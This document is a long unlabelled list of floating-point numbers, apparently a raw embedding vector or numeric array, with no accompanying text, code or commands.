0.01092132180929184, 0.002453205641359091, 0.015191647224128246, 0.00048450345639139414, 0.006889062467962503, 0.03499584272503853, 0.0003896486305166036, 0.008882872760295868, -0.008198430761694908, 0.010631177574396133, 0.005951673723757267, -0.015065174549818039, -0.026142727583646774, 0.012565471231937408, 0.01847994700074196, 0.013227595016360283, -0.00921765435487032, 0.009589634835720062, 0.013331749476492405, 0.010527023114264011, -0.027407458052039146, 0.0073093995451927185, -0.03053208626806736, -0.016709323972463608, -0.014187302440404892, 0.0009717967477627099, -0.008131474256515503, -0.009678909555077553, 0.005955393426120281, 0.016352223232388496, 0.009031664580106735, 0.010564221069216728, -0.02693132311105728, -0.016486136242747307, -0.011538807302713394, -0.009775624610483646, 0.004523272160440683, -0.01965540274977684, 0.0027080115396529436, 0.0013912037247791886, -0.02524997666478157, 0.04419117793440819, 0.016277827322483063, -0.018033571541309357, 0.0016748382477089763, -0.0076776593923568726, -0.0071940855123102665, 0.026589103043079376, 0.01998274400830269, -0.01076508965343237, 0.025279734283685684, -0.000884381530340761, 0.0026298959273844957, -0.031008221209049225, -0.006520802620798349, -0.0026205964386463165, 0.016143914312124252, 0.006978337652981281, 0.01044518779963255, 0.003217623569071293, -0.01742352545261383, -0.01664980687201023, 0.006636116188019514, -0.006238098256289959, 0.022556843236088753, 0.011985182762145996, -0.008793598040938377, 0.006900222040712833, 0.005884717684239149, 0.001388413948006928, 0.022333655506372452, -0.007320558652281761, 0.009039104916155338, -0.03434115648269653, -0.011933105997741222, 0.03326985612511635, 0.024461379274725914, -0.016084399074316025, 0.009567315690219402, -0.016054639592766762, 0.0296244565397501, -0.003100450150668621, 0.0145369628444314, 0.00853321235626936, 0.006513363216072321, -0.0060632675886154175, -0.002672673435881734, 0.014968459494411945, 0.024000125005841255, 0.0018561782781034708, 0.013755805790424347, 0.011166827753186226, -0.0213367510586977, -0.00926229264587164, -0.012000062502920628, 0.02239317260682583, -0.0010368932271376252, 0.03609690070152283, 0.0015837032115086913, -0.015533868223428726, 0.005241192877292633, -0.02394060790538788, 0.014953580684959888, 0.008324903436005116, -0.011642961762845516, -0.0167985986918211, -0.027452096343040466, 0.012736582197248936, -0.008562970906496048, 0.014477446675300598, 0.017408646643161774, -0.009902097284793854, -0.005981432273983955, -0.00958219449967146, -0.024000125005841255, -0.022512206807732582, -0.004121534060686827, 0.03654327616095543, -0.022675877436995506, -0.012587790377438068, 0.000004842273483518511, 0.006238098256289959, -0.018822168931365013, 0.03071063756942749, 0.027452096343040466, 0.004240567795932293, 0.017393765971064568, -0.005907036364078522, 0.0017864321125671268, -0.00012240454088896513, -0.02334544062614441, 0.012595229782164097, -0.0028344846796244383, -0.006513363216072321, 0.0022951140999794006, 0.010043449699878693, 0.032287828624248505, 0.02770504169166088, 0.026514707133173943, -0.004028539173305035, -0.007242443040013313, 0.00969378836452961, 0.007699978072196245, 0.011523928493261337, 0.010854365304112434, 0.000511936959810555, -0.012952330522239208, 0.015980243682861328, 0.01865849830210209, 0.010177361778914928, 0.01879240944981575, 0.018048450350761414, -0.014737832359969616, 0.013711168430745602, 0.007495389319956303, -0.013934356160461903, 0.016367102041840553, 0.009902097284793854, -0.0057470849715173244, 0.005605732556432486, 0.022318776696920395, -0.02416379563510418, -0.0479704923927784, 0.0019845112692564726, -0.03443043306469917, -0.0017873620381578803, 0.012096776627004147, -0.016173673793673515, -0.009820261970162392, 0.020756462588906288, 0.013800444081425667, -0.01843530870974064, 0.008867993950843811, 0.02493751235306263, -0.019908348098397255, 0.006520802620798349, 0.023806694895029068, 0.008853115141391754, 0.009106060490012169, 0.01775086671113968, -0.00273033045232296, 0.015087492763996124, 0.004080616403371096, -0.04216760769486427, 0.036692067980766296, 0.02957981824874878, 0.05088680982589722, -0.03362695872783661, 0.009649151004850864, -0.028463879600167274, -0.02865730971097946, -0.01089900266379118, 0.0012786799343302846, -0.012200931087136269, 0.020191052928566933, 0.00556109519675374, -0.007513988297432661, -0.013495420105755329, -0.0036602793261408806, -0.009656590409576893, -0.015050294809043407, 0.022140227258205414, 0.01833115518093109, 0.007945484481751919, 0.001631130580790341, -0.010519583709537983, 0.018673377111554146, 0.027898471802473068, -0.021738488227128983, 0.0021184238139539957, -0.004385639447718859, 0.012505954131484032, -0.025279734283685684, 0.002040308201685548, 0.03335913270711899, -0.02611296810209751, 0.04755387455224991, 0.011412334628403187, 0.001022013952024281, -0.006543121300637722, -0.012580350041389465, 0.03752530366182327, -0.03389478102326393, 0.010102965869009495, 0.0005654090200550854, 0.00006108602974563837, 0.019268544390797615, 0.006636116188019514, 0.0016729782801121473, -0.013264792971313, -0.01101059652864933, 0.004817136097699404, 0.0006858374108560383, -0.009887218475341797, -0.002373229945078492, -0.011657841503620148, -0.007394954562187195, -0.024580413475632668, -0.010266637429594994, -0.014462566934525967, -0.000185641081770882, 0.009768184274435043, 0.024312587454915047, -0.010214559733867645, 0.01847994700074196, -0.022467568516731262, 0.01711106300354004, -0.00426660617813468, -0.0075846645049750805, 0.0015781235415488482, 0.014135225676000118, 0.009797942824661732, -0.005393704399466515, 0.008376981131732464, 0.0032511018216609955, 0.004240567795932293, -0.010809727944433689, -0.002726610517129302, 0.02516070008277893, -0.03365671634674072, 0.009835140779614449, -0.00012321824033278972, -0.004865493159741163, 0.012438998557627201, 0.018256759271025658, 0.01383020170032978, 0.002717311028391123, 0.022913943976163864, 0.004977087024599314, -0.024773841723799706, 0.00010717662371462211, 0.00982770137488842, -0.029639335349202156, -0.005773123819380999, 0.0010322434827685356, -0.013532618060708046, 0.03687061741948128, 0.0015130271203815937, -0.0032827199902385473, 0.0051444778218865395, -0.013473101891577244, -0.016679566353559494, -0.0061562624759972095, -0.02352399006485939, -0.00763302156701684, -0.009076302871108055, 0.008674564771354198, -0.025696352124214172, -0.01693251170217991, 0.034608982503414154, -0.02016129530966282, -0.0050142849795520306, 0.04154268279671669, -0.005613172426819801, 0.024223312735557556, 0.0138748399913311, 0.014589040540158749, 0.004184770863503218, 0.02639567293226719, -0.006740270648151636, -0.003987621515989304, -0.00780413206666708, 0.014135225676000118, 0.010199680924415588, -0.012349722906947136, 0.0012982088373973966, -0.016039760783314705, -0.006029789336025715, -0.03231758996844292, 0.013502859510481358, 0.00814635306596756, 0.012572910636663437, 0.01435841340571642, -0.006509643048048019, 0.009515238925814629, 0.013212716206908226, -0.03443043306469917, -0.0072164046578109264, -0.016322465613484383, -0.0056168921291828156, 0.004679503384977579, -0.009083742275834084, 0.0020626268815249205, 0.010222000069916248, -0.02648494765162468, 0.016129035502672195, 0.012386920861899853, 0.04213785007596016, -0.006617517210543156, 0.021039167419075966, -0.0030372135806828737, 0.0018143305787816644, -0.002683833008632064, -0.013599574565887451, -0.007060172967612743, -0.017081303521990776, 0.033775750547647476, -0.015727298334240913, -0.005951673723757267, 0.009433402679860592, 0.006933699827641249, -0.0064315274357795715, 0.008615047670900822, 0.01620343141257763, -0.02739257924258709, -0.02115819975733757, -0.02016129530966282, -0.02020593173801899, 0.014975898899137974, 0.011070113629102707, -0.002685692859813571, 0.016129035502672195, 0.015027976594865322, 0.009887218475341797, -0.01751280017197132, -0.013383826240897179, 0.014879184775054455, -0.0003833714872598648, -0.017349129542708397, 0.00592563534155488, 0.00921765435487032, -0.005739645566791296, 0.013235034421086311, 0.01633734442293644, -0.03389478102326393, -0.017810383811593056, 0.006844424642622471, 0.006680754013359547, 0.007119689602404833, -0.012930011376738548, 0.01870313473045826, 0.01788477972149849, 0.004021099768579006, -0.015117251314222813, 0.028746584430336952, 0.011367697268724442, 0.01706642471253872, 0.00286610284820199, 0.03163314610719681, -0.05314844846725464, 0.0014944281429052353, -0.0072461627423763275, 0.01669444516301155, -0.003983901813626289, -0.022214623168110847, 0.005702447611838579, 0.018628738820552826, 0.0029665373731404543, 0.029282234609127045, 0.005122159142047167, 0.006658434867858887, 0.0020607670303434134, 0.0005756384343840182, -0.01920902729034424, 0.008339783176779747, 0.010995717719197273, 0.005475539714097977, -0.003688177792355418, 0.010021130554378033, -0.002442046068608761, -0.00036756234476342797, 0.009745866060256958, -0.0318414531648159, 0.025354130193591118, -0.0008104505832307041, 0.002040308201685548, -0.02001250348985195, -0.001563244266435504, -0.027779437601566315, -0.02224438078701496, 0.008763839490711689, -0.0016999468207359314, -0.002185380319133401, 0.0020737864542752504, -0.010214559733867645, 0.02151530049741268, 0.01565290242433548, -0.014879184775054455, -0.022780030965805054, 0.0016357803251594305, -0.005918195471167564, -0.00454931054264307, -0.0036993371322751045, 0.018956081941723824, -0.005854959134012461, 0.006903941743075848, 0.013361508026719093, 0.04213785007596016, 0.015533868223428726, 0.01087668351829052, -0.014663436450064182, -0.0024308867286890745, 0.015042855404317379, -0.005274671129882336, 0.008138913661241531, 0.015593385323882103, -0.008719202131032944, 0.002456925343722105, -0.0038871869910508394, -0.012245568446815014, -0.016456378623843193, -0.014663436450064182, -0.022050950676202774, -0.012684504501521587, -0.001504657557234168, 0.028746584430336952, 0.004240567795932293, 0.01028151623904705, 0.016917632892727852, 0.017036667093634605, -0.0143137751147151, -0.000548669951967895, -0.010593979619443417, 0.008748960681259632, 0.0006435247487388551, 0.01092132180929184, -0.008920070715248585, 0.03794192150235176, -0.007528867572546005, -0.0020179892890155315, 0.006721671670675278, 0.028002625331282616, 0.011003157123923302, 0.000998765230178833, -0.014641117304563522, 0.03398405760526657, -0.010720452293753624, 0.012744021601974964, -0.004236847627907991, -0.020101778209209442, -0.016218310222029686, -0.018673377111554146, -0.018628738820552826, 0.0019231345504522324, 0.00420708954334259, 0.004575349390506744, 0.00948548037558794, -0.0038574286736547947, 0.0058103217743337154, -0.00004042372165713459, 0.016129035502672195, -0.0022021192125976086, 0.01313087996095419, 0.014841986820101738, 0.0022839547600597143, 0.003762573702260852, 0.019313180819153786, -0.01596536487340927, 0.0033385169226676226, 0.025101184844970703, 0.01810796745121479, 0.006907661445438862, 0.019685160368680954, 0.014611358754336834, -0.008183551020920277, 0.003965302836149931, -0.004274045582860708, 0.0019714918453246355, -0.013778124935925007, 0.021545059978961945, -0.012468756176531315, 0.001993810757994652, 0.007484229747205973, 0.012453877367079258, -0.027035478502511978, -0.0037551342975348234, -0.009076302871108055, 0.010794848203659058, 0.009730986319482327, -0.009872338734567165, -0.006409208755940199, -0.001227532746270299, -0.0016469397814944386, -0.017140820622444153, 0.006870463490486145, 0.008808476850390434, -0.002220718190073967, -0.007063892669975758, -0.024744084104895592, -0.0232115276157856, 0.006386890076100826, -0.006479884963482618, 0.009656590409576893, 0.005241192877292633, 0.00460882717743516, 0.000769997772295028, -0.008734080940485, -0.012297646142542362, -0.016501015052199364, -0.012290206737816334, -0.01574217714369297, 0.016843236982822418, -0.022958582267165184, 0.0015604544896632433, -0.003308758605271578, 0.003091150661930442, 0.0055648148991167545, -0.007577224634587765, 0.017483042553067207, 0.0060744271613657475, -0.015236284583806992, -0.01053446251899004, -0.007104810792952776, -0.008429057896137238, 0.016843236982822418, -0.016277827322483063, -0.008927511051297188, -0.02120283804833889, -0.009158138185739517, -0.009254852309823036, 0.022169984877109528, -0.0047204215079545975, 0.0045530302450060844, -0.007967803627252579, 0.01660517044365406, -0.002127723302692175, -0.015861211344599724, 0.025130942463874817, 0.015682660043239594, 0.004069456830620766, 0.016054639592766762, -0.0053007095120847225, 0.006822105962783098, 0.006059547886252403, -0.01609927788376808, 0.004865493159741163, 0.02188728004693985, 0.004936169367283583, 0.006740270648151636, -0.014388171024620533, 0.0029330593533813953, -0.0032418023329228163, -0.0021686411928385496, 0.016054639592766762, 0.00427776575088501, 0.013733487576246262, 0.010021130554378033, -0.027466975152492523, -0.0011819652281701565, 0.0017417945200577378, -0.014499764889478683, 0.0060744271613657475, -0.025398768484592438, -0.027511611580848694, -0.004121534060686827, -0.0024662248324602842, 0.02524997666478157, -0.024744084104895592, -0.015638023614883423, -0.016322465613484383, -0.013934356160461903, -0.019804194569587708, -0.007685098797082901, -0.017542557790875435, 0.013160638511180878, 0.00015239539789035916, 0.025919539853930473, -0.018628738820552826, -0.0015093073016032577, -0.024372104555368423, 0.008406739681959152, 0.03704917058348656, -0.0014460707316175103, -0.01775086671113968, -0.014938700944185257, -0.005468100309371948, -0.011390015482902527, 0.004080616403371096, 0.001888726488687098, -0.011695039458572865, -0.003178565762937069, 0.0007509338320232928, -0.0035672844387590885, -0.00554993562400341, -0.02911856397986412, 0.0027563688345253468, 0.012000062502920628, 0.004917570389807224, 0.009336688555777073, 0.006799787282943726, -0.002404848113656044, -0.00816867221146822, -0.0011140789138153195, 0.010184802114963531, 0.011174267157912254, 0.010274076834321022, 0.00349846831522882, 0.00745075149461627, 0.012431558221578598, -0.0017408645944669843, -0.0011763855582103133, -0.0052486322820186615, -0.00010822281910805032, -0.001954752951860428, 0.007361476309597492, -0.014365852810442448, 0.00036291260039433837, 0.009254852309823036, 0.01303416583687067, -0.025770748034119606, 0.0025294614024460316, 0.00273033045232296, -0.010296395979821682, 0.02770504169166088, 0.02434234507381916, 0.0008801967487670481, 0.012572910636663437, -0.0035207869950681925, 0.006264136638492346, 0.014001312665641308, -0.021545059978961945, -0.022214623168110847, -0.015444593504071236, -0.011553687043488026, -0.002869822783395648, 0.012200931087136269, 0.019223906099796295, -0.0068109468556940556, 0.016233190894126892, -0.0022802350576967, -0.00937388651072979, 0.00034919584868475795, -0.0012461317237466574, 0.01861386001110077, 0.01435841340571642, 0.0014051529578864574, 0.011724797077476978, -0.0064315274357795715, -0.013532618060708046, -0.014916382730007172, -0.015310680493712425, 0.00862248707562685, -0.0019435934955254197, -0.007893407717347145, 0.002918180078268051, -0.010705573484301567, -0.005486699286848307, 0.0005793582531623542, -0.0031506672967225313, -0.003275280585512519, -0.009448282420635223, -0.0022076989989727736, -0.008994466625154018, -0.010861804708838463, -0.008101715706288815, 0.01711106300354004, -0.009678909555077553, 0.013346628285944462, 0.01278865896165371, 0.007164327427744865, -0.05651114135980606, 0.0016766980988904834, 0.005661529488861561, -0.009664030745625496, -0.003362695686519146, -0.004370760638266802, -0.001504657557234168, -0.009544996544718742, 0.021440904587507248, -0.011084992438554764, 0.030338658019900322, -0.00673283077776432, 0.009492919780313969, 0.00337757496163249, -0.003176705911755562, 0.023285923525691032, -0.018584100529551506, 0.011925666593015194, -0.011568565852940083, -0.025324372574687004, 0.0008806617115624249, 0.012401800602674484, -0.018271638080477715, 0.03199024498462677, -0.00875640008598566, -0.012818417511880398, 0.010341033339500427, -0.0007397744338959455, -0.03163314610719681, 0.0032473821192979813, 0.000042457984818611294, -0.00763302156701684, -0.0033757148776203394, -0.006967178080230951, 0.005081241484731436, 0.025413647294044495, -0.004965927917510271, 0.020667187869548798, -0.01505773514509201, -0.00002454193599987775, 0.003636100795120001, -0.0006914170808158815, -0.031960487365722656, -0.012751461006700993, 0.0036435401998460293, 0.0422271266579628, 0.00657287985086441, -0.012364602647721767, 0.009969053789973259, -0.0012154433643445373, 0.017780626192688942, -0.011293301358819008, 0.01376324612647295, -0.023806694895029068, 0.011583445593714714, -0.021262355148792267, 0.0005389054422266781, -0.032109279185533524, -0.01314575970172882, 0.002821465255692601, -0.013212716206908226, -0.011501609347760677, -0.0057470849715173244, -0.009954174049198627, -0.0182418804615736, -0.007142008747905493, 0.010951079428195953, 0.033507924526929855, 0.0288507379591465, 0.014894063584506512, 0.01837579347193241, -0.02361326664686203, -0.0052077146247029305, -0.009403645060956478, -0.00546066090464592, -0.007759494706988335, 0.026648620143532753, 0.024773841723799706, -0.0074619110673666, 0.0009448282071389258, -0.0008662475156597793, 0.008927511051297188, -0.01978931576013565, -0.0018292097374796867, 0.007878527976572514, 0.021812884137034416, -0.012014941312372684, 0.004110374487936497, 0.006818386260420084, 0.027243787422776222, -0.007313119247555733, 0.0064836046658456326, 0.012863054871559143, 0.014098027721047401, -0.017274733632802963, 0.006558000575751066, 0.012572910636663437, -0.013845081441104412, -0.0018524584593251348, -0.012617548927664757, -0.019819073379039764, -0.01517676841467619, 0.00562061183154583, 0.0006235308246687055, -0.006691913120448589, 0.008176111616194248, -0.002947938395664096, 0.0030130348168313503, 0.0134879807010293, 0.01720033772289753, 0.008763839490711689, 0.0085108932107687, 0.034549467265605927, 0.013383826240897179, 0.021262355148792267, -0.022452689707279205, 0.014804788865149021, -0.019461972638964653, 0.00021121467580087483, 0.00461998675018549, 0.012944890186190605, -0.016590291634202003, 0.0028902816120535135, 0.034192364662885666, 0.0023936887737363577, -0.0035635647363960743, -0.00923253409564495, -0.002416007686406374, -0.016396861523389816, 0.0064426870085299015, 0.00033361921668983996, 0.012074458412826061, -0.018122846260666847, 0.003455690573900938, -0.007063892669975758, -0.0004924079985357821, 0.0012693804455921054, 0.0010424728970974684, -0.011390015482902527, -0.009812822565436363, 0.01351029984652996, -0.006148823071271181, -0.020622549578547478, -0.016143914312124252, 0.034549467265605927, -0.0014730392722412944, -0.0013623753329738975, 0.030502328649163246, 0.012074458412826061, 0.007885967381298542, -0.0026057171635329723, 0.004359601065516472, -0.011077553033828735, 0.003991341218352318, -0.005854959134012461, 0.00023609081108588725, -0.005099840462207794, -0.003096730215474963, 0.00909862108528614, 0.019030477851629257, 0.004500953480601311, 0.011642961762845516, -0.022467568516731262, -0.00230441358871758, 0.010467506013810635, 0.018167484551668167, -0.001885006669908762, 0.02379181608557701, -0.01109987124800682, 0.016218310222029686, -0.0041066547855734825, -0.001665538758970797, -0.0004696242685895413, -0.005542496219277382, -0.014782469719648361, -0.006587759125977755, 0.0018199102487415075, -0.000040365601307712495, 0.009165577590465546, -0.014655997045338154, -0.008466255851089954, -0.004653465002775192, -0.015199086628854275, -0.03877515345811844, 0.009991372004151344, 0.017408646643161774, 0.014298896305263042, -0.015548747964203358, -0.012416679412126541, 0.0025536399334669113, -0.012476196512579918, 0.01360701397061348, 0.015489230863749981, -0.013859960250556469, -0.011747116222977638, -0.00657287985086441, 0.018718013539910316, -0.014566721394658089, 0.03776337206363678, 0.03681110218167305, -0.010222000069916248, 0.0018078208668157458, -0.0006765379221178591, 0.004590228199958801, 0.006524522323161364, -0.008689443580806255, -0.011092431843280792, 0.004958488047122955, 0.02356862835586071, -0.00004428882311913185, 0.01301184669137001, -0.0029460785444825888, 0.0028010064270347357, -0.003909505903720856, 0.020949892699718475, -0.0016292707296088338, -0.004188490565866232, 0.0007899916963651776, -0.009455721825361252, 0.012714263051748276, 0.00407317653298378, -0.012148854322731495, -0.014239379204809666, -0.011308180168271065, 0.009641711600124836, 0.016575410962104797, 0.0004312638775445521, -0.0040657371282577515, 0.004088055808097124, 0.010474946349859238, 0.0031078895553946495, 0.01620343141257763, -0.017721109092235565, -0.004768778569996357, -0.020265448838472366, 0.0011708058882504702, 0.01064605638384819, 0.006193460430949926, 0.021619455888867378, -0.025636835023760796, 0.01574217714369297, 0.0020179892890155315, -0.02374717779457569, 0.005103560164570808, -0.0016106717521324754, 0.003809071145951748, -0.00898702722042799, 0.0027879872359335423, -0.010839485563337803, -0.019729798659682274, -0.02219974249601364, 0.007766934111714363, 0.014492325484752655, 0.021678971126675606, -0.0020254289265722036, 0.001479548867791891, -0.007863649167120457, -0.015816573053598404, -0.016352223232388496, -0.017125941812992096, -0.008243068121373653, -0.020101778209209442, 0.008845674805343151, 0.02780919522047043, -0.014752711169421673, -0.030561845749616623, -0.02411915734410286, -0.0011680159950628877, 0.0023453314788639545, -0.004675783682614565, -0.003916945308446884, -0.02292882278561592, -0.03859660401940346, -0.0007104810792952776, -0.004047138150781393, -0.0047092619352042675, -0.021351629868149757, 0.031157013028860092, -0.022080710157752037, 0.012654746882617474, 0.018033571541309357, -0.014655997045338154, -0.008726641535758972, 0.008071957156062126, 0.0011652261018753052, -0.0072982399724423885, -0.0021630614064633846, -0.013197836466133595, -0.029520301148295403, 0.011084992438554764, -0.010727891698479652, -0.015213966369628906, -0.01503541599959135, 0.010861804708838463, -0.006851864513009787, -0.008198430761694908, -0.019283423200249672, 0.017006907612085342, 0.0013623753329738975, 0.01833115518093109, 0.007435872685164213, 0.005921915639191866, 0.000537045591045171, 0.004753899294883013, -0.011159388348460197, -0.013592135161161423, -0.010333593934774399, -0.007439592387527227, 0.022690756246447563, 0.007037854287773371, -0.015206526964902878, -0.011702478863298893, 0.032972272485494614, 0.003515207441523671, 0.006729111075401306, 0.012967209331691265, 0.031276047229766846, -0.00408433610573411, -0.0004419582837726921, -0.0007044363883323967, 0.006558000575751066, -0.007580944336950779, 0.011345378123223782, 0.012476196512579918, -0.008466255851089954, 0.00959707424044609, 0.009254852309823036, 0.010541901923716068, -0.027243787422776222, -0.031960487365722656, -0.026098089292645454, -0.020191052928566933, -0.007346597500145435, 0.02087549678981304, -0.0015892828814685345, 0.014864305034279823, 0.01075765024870634, 0.0051965550519526005, 0.004318683408200741, 0.02211046777665615, 0.033418647944927216, -0.002172360895201564, 0.02179800532758236, 0.004184770863503218, -0.004783657845109701, -0.0000501300637552049, -0.02279490977525711, -0.0031525271479040384, 0.006435247138142586, -0.02615760639309883, -0.005557375494390726, -0.009061423130333424, -0.007729736156761646, 0.005869838409125805, 0.004140133038163185, -0.010162482969462872, 0.011866149492561817, -0.009083742275834084, -0.025458285585045815, -0.018822168931365013, -0.017572317272424698, 0.02615760639309883, 0.026529585942626, -0.0005244912463240325, 0.003091150661930442, -0.0036100621800869703, -0.011665280908346176, 0.0021667813416570425, -0.001681347843259573, 0.02993691898882389, 0.004735300317406654, -0.038477569818496704, 0.010207120329141617, -0.01720033772289753, 0.029178081080317497, 0.0052597918547689915, 0.0028475038707256317, -0.015429714694619179, 0.010199680924415588, -0.01764671318233013, -0.003686317941173911, -0.0004573024343699217, -0.0049845268949866295, 0.025726109743118286, 0.01952148973941803, -0.004214528948068619, 0.010251757688820362, 0.028493639081716537, -0.0058400798588991165, 0.01408314798027277, -0.0011642961762845516, 0.008845674805343151, -0.005962833296507597, 0.006799787282943726, 0.006650995463132858, -0.008429057896137238, 0.00209796498529613, -0.011337938718497753, -0.012319964356720448, -0.011300740763545036, 0.003861148376017809, -0.007465630769729614, 0.008629927411675453, 0.005296989809721708, -0.025547560304403305, -0.008548091165721416, -0.0021909598726779222, 0.006435247138142586, 0.003777452977374196, 0.0015948625514283776, 0.012379481457173824, 0.00021691061556339264, 0.013346628285944462, 0.005371385719627142, -0.006677033845335245, 0.003762573702260852, -0.002378809731453657, 0.010073208250105381, -0.00236579030752182, 0.00527839083224535, -0.01629270613193512, -0.014775030314922333, -0.01578681543469429, 0.00900934636592865, -0.008228189311921597, -0.002821465255692601, -0.006881623063236475, 0.024699445813894272, -0.011494169943034649, 0.00543834175914526, -0.013592135161161423, -0.015117251314222813, 0.004988246597349644, 0.009143258444964886, -0.03493632376194, -0.00010560733790043741, -0.034787531942129135, -0.0077446154318749905, 0.033924542367458344, 0.018137725070118904, -0.012275326997041702, 0.005081241484731436, -0.01173967681825161, -0.011724797077476978, 0.009150698781013489, 0.0067588696256279945, -0.001113148988224566, 0.0015753336483612657, -0.019952986389398575, -0.0277496799826622, -0.004385639447718859, -0.0024383263662457466, -0.023776937276124954, 0.013733487576246262, 0.003783032763749361, -0.04353649541735649, 0.004489793907850981, 0.009068862535059452, 0.0018738473299890757, 0.0015911428490653634, 0.00937388651072979, -0.02325616590678692, -0.003094870364293456, 0.007372635882347822, -0.012148854322731495, 0.009954174049198627, -0.0008192851091735065, 0.011583445593714714, 0.015027976594865322, -0.0034445312339812517, -0.0030297739431262016, -0.008503453806042671, 0.015370197594165802, -0.019640523940324783, -0.000013883848623663653, 0.0027154511772096157, 0.016441497951745987, -0.014053389430046082, 0.01952148973941803, 0.0019677721429616213, 0.01742352545261383, -0.0020644869655370712, -0.008600168861448765, -0.016962271183729172, 0.0031041698530316353, -0.0072573223151266575, -0.006308774463832378, 0.018539464101195335, -0.0025778186973184347, 0.016753962263464928, -0.00959707424044609, -0.008488574996590614, -0.001661818940192461, 0.032287828624248505, 0.008488574996590614, -0.015206526964902878, -0.0018050310900434852, -0.0003052557585760951, 0.015139570459723473, 0.013435903936624527, -0.006293895188719034, -0.008324903436005116, 0.005029164254665375, 0.013912037946283817, 0.024282829836010933, -0.012513394467532635, -0.016307586804032326, -0.007878527976572514, 0.001727845286950469, -0.00012228830019012094, 0.014953580684959888, -0.01697714999318123, -0.004828295204788446, 0.024372104555368423, 0.003721656044945121, -0.011590884998440742, 0.015623143874108791, -0.01278865896165371, 0.007368916179984808, -0.006900222040712833, 0.008615047670900822, 0.024833358824253082, 0.011881029233336449, -0.0008123104926198721, -0.004928729962557554, -0.019685160368680954, -0.021902158856391907, 0.00381651078350842, -0.004419117700308561, 0.011211465112864971, 0.003355256048962474, -0.019536368548870087, 0.00461998675018549, 0.008451377041637897, 0.018494825810194016, 0.02279490977525711, -0.017185458913445473, 0.01101059652864933, 0.024535775184631348, 0.015846330672502518, -0.020101778209209442, 0.015117251314222813, 0.017125941812992096, 0.01766159199178219, 0.0040768967010080814, 0.006558000575751066, 0.0014191021909937263, 0.02356862835586071, -0.0008908911840990186, -0.0014181722654029727, -0.015563626773655415, 0.012937450781464577, -0.007967803627252579, 0.011583445593714714, -0.004285205155611038, 0.001795731601305306, 0.009649151004850864, 0.0030204744543880224, -0.028508517891168594, 0.003364555537700653, 0.020964771509170532, 0.0017464442644268274, 0.006610077805817127, -0.015236284583806992, 0.004939889069646597, -0.005613172426819801, 0.011925666593015194, -0.007089931517839432, -0.0033533961977809668, -0.01360701397061348, 0.020354723557829857, -0.006089306436479092, -0.0009159998153336346, 0.0043819197453558445, 0.005456940736621618, -0.0009383185533806682, 0.017810383811593056, 0.012491075322031975, 0.00657287985086441, -0.0172449741512537, -0.0003154852020088583, 0.005137038417160511, 0.00354868546128273, -0.016634928062558174, -0.014499764889478683, 0.0030818511731922626, 0.02538388967514038, -0.007833890616893768, -0.007149448152631521, -0.00340175349265337, -0.013636772520840168, 0.00331619824282825, 0.004835735075175762, -0.005665249656885862, 0.009559876285493374, -0.00407317653298378, 0.02780919522047043, -0.008964709006249905, 0.008257947862148285, -0.002319292863830924, -0.0013726047473028302, -0.015563626773655415, -0.013659091666340828, -0.013227595016360283, 0.007357756607234478, 0.009292050264775753, -0.0004440506745595485, -0.003000015625730157, -0.017408646643161774, 0.012736582197248936, -0.000543090223800391, -0.00909862108528614, 0.009068862535059452, 0.0022858146112412214, 0.0046571847051382065, 0.0028140258509665728, 0.005877277813851833, 0.01987859047949314, -0.005044043529778719, 0.012959769926965237, -0.018093088641762733, -0.0067477100528776646, -0.0054718200117349625, 0.01328711211681366, -0.00923997350037098, 0.00016204362327698618, -0.0030316337943077087, 0.011583445593714714, -0.01583145186305046, -0.0005840079975314438, 0.021262355148792267, -0.020905254408717155, -0.020191052928566933, -0.01711106300354004, -0.012877934612333775, 0.00004702054866356775, -0.008629927411675453, 0.025145821273326874, -0.009455721825361252, 0.0014107326278463006, 0.01517676841467619, -0.0029907161369919777, 0.012438998557627201, 0.0167985986918211, 0.0014711794210597873, 0.008562970906496048, -0.007863649167120457, -0.0047501795925199986, -0.0055759744718670845, -0.009634272195398808, -0.003042793134227395, 0.011181707493960857, 0.03954887390136719, 0.0201166570186615, 0.023955486714839935, -0.005315588787198067, -0.025726109743118286, -0.019640523940324783, -0.02306273579597473, -0.006491044070571661, -0.0026038573123514652, 0.012245568446815014, -0.0070341345854103565, -0.0000463521464553196, -0.0041178143583238125, 0.006152542773634195, 0.025651713833212852, 0.007774373982101679, -0.005148197989910841, 0.004694382660090923, -0.015459472313523293, -0.0021054046228528023, 0.017006907612085342, -0.0012070738011971116, 0.044518519192934036, 0.022303897887468338, -0.01919414848089218, 0.00022911619453225285, -0.02020593173801899, -0.000033042251743609086, -0.00030223344219848514, -0.002817745553329587, -0.00479109724983573, 0.005836360156536102, -0.013294551521539688, 0.007737176027148962, 0.014038510620594025, -0.025413647294044495, -0.004597668070346117, -0.013978993520140648, -0.004385639447718859, 0.0009717967477627099, 0.003593323053792119, -0.0034445312339812517, 0.0058512394316494465, 0.009507798589766026, -0.04026307165622711, 0.014075708575546741, 0.010110406205058098, 0.010549342259764671, 0.023092495277523994, -0.01501309685409069, 0.0044860742054879665, 0.004430277273058891, 0.01264730654656887, 0.012796098366379738, -0.003273420501500368, -0.030383294448256493, -0.002045887755230069, 0.010229439474642277, 0.017125941812992096, 0.007413553539663553, 0.009857459925115108, 0.018643617630004883, 0.017230095341801643, 0.008845674805343151, -0.011025475338101387, 0.006133943796157837, -0.03103797882795334, 0.002683833008632064, 0.008815917186439037, -0.01410546712577343, 0.014626238495111465, -0.006829545833170414, -0.02129211276769638, -0.007606983184814453, -0.009448282420635223, 0.009842580184340477, 0.013941795565187931, 0.014908943325281143, -0.020949892699718475, -0.01865849830210209, 0.005683848634362221, -0.01019224151968956, 0.0027991465758532286, -0.0004938029451295733, 0.003783032763749361, 0.014700634405016899, -0.010385670699179173, 0.00015844005974940956, 0.010207120329141617, 0.0014163124142214656, -0.014202181249856949, 0.009790503419935703, -0.006059547886252403, 0.010512144304811954, -0.016545653343200684, 0.0000039777114579919726, 0.007766934111714363, -0.02475896291434765, -0.008324903436005116, -0.002724750665947795, -0.004593948367983103, -0.004400518722832203, -0.01447000727057457, 0.003085570875555277, 0.01551898941397667, -0.006855584215372801, 0.011367697268724442, -0.008600168861448765, 0.006066987290978432, 0.017988933250308037, 0.006245537661015987, 0.029743490740656853, 0.00948548037558794, -0.002773107960820198, -0.003509627655148506, 0.01711106300354004, 0.01219349168241024, 0.014827107079327106, -0.0034129128325730562, 0.00114011752884835, -0.0018412991194054484, 0.01642661914229393, 0.0031078895553946495, 0.01526604313403368, 0.01526604313403368, 0.001965912291780114, -0.01112219039350748, 0.006684473715722561, -0.022824669256806374, 0.009336688555777073, 0.0038909066934138536, 0.004991966299712658, 